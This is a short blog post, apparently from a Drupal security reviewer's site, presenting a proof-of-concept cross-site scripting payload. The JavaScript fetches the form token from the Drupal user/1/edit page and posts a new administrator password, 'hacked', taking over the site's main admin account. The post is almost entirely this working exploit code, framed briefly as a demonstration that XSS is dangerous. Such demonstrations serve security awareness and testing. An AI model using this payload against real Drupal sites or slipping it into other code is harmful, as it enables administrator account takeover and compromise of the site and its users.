Heine

  • Home
  • Drupal
  • About
Home

Update UID 1 password via JS

Heine —Mon, 2008/01/14 - 09:08

A simple proof of concept (without <script> tags) to reset to the Administrators' password via a cross site scripting attack (XSS). Did you think XSS was harmless?

// Test for  the presence of jquery.
if (typeof jQuery == 'function') {
  // Fetch a correct token from user/1/edit because we will need it to
  // successfully submit the user edit form later.
  // TODO: Include a check to increase the chance that the current user is admin,
  // which will reduce the number of access denied error messages in the log.
  jQuery.get('/user/1/edit',
    function (data, status) {
      if (status == 'success') {
        // Extract the token.
        var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
        var token = matches[1];
        // Post the minimum amount of fields. Other fields get their default values.
        var payload = {
          "form_id": 'user_edit',
          "form_token": token,
          "pass[pass1]": 'hacked',
          "pass[pass2]": 'hacked'
        };
        jQuery.post('/user/1/edit', payload);
      }
    }
  );
}
  • Security

Recent posts

  • Teampassword manager's password generator is biased
  • Other vectors for SA-CORE-2014-005?
  • Lazy loading: hook_hook_info is for hook owners only.
  • "Always offline" problem in EA's Origin due to antivirus
  • From bug to exploit - Bakery SSO
more

Security reviews

I provide security reviews of custom code, contributed modules, themes and entire sites via LimoenGroen.

Contact us for a quote.

Follow @ustima

Copyright © 2021 by Heine Deelstra. All rights reserved.

  • Home
  • Drupal
  • About